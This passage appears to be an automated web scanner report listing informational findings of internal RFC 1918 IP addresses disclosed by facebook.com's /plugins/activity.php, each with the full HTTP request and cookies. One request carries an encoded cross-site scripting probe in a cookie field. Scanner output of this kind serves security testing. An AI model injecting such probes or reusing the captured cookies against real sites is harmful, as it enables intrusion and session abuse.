GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.269. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.235.83

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.270. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.64.107

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.271. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.37

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.272. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.67.39

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.273. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.50.53

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.274. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.132.121

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.275. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.117.33

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.276. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.137.112

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.277. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.154.45

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.278. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.136.103

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.279. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.98.130

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.280. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.132.111

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.281. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.192.29

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.282. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.77.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.283. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.111.114

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.284. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.69.106

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.285. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.194.46

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.286. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.149.49

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

20.287. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.72.53

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.288. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.134.126

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.289. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.57.55

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.290. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.105.115

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
